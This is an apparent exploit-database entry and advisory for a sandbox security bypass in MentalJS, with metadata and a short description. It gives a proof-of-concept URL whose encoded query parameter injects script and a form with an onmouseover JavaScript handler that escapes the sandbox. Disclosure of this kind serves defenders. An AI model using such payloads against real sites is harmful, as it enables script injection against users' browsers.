MentalJS - Sandbox Security Bypass
Author: Rafay Baloch
type: webapps
platform: php
port:
date_added: 2013-09-20
date_updated: 2015-11-20
verified: 1
codes: OSVDB-97659
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/62581/info
MentalJS is prone to a security-bypass vulnerability.
An attacker can exploit this issue to bypass sandbox security restrictions and perform unauthorized actions; this may aid in launching further attacks.
http://www.example.com/demo/demo-deny-noescape.html?test=%3Cscript%3Edocument.body.innerHTML=%22%3Cform+onmouseover=javascript:alert(0);%3E%3Cinput+name=attributes%3E%22;%3C/script%3E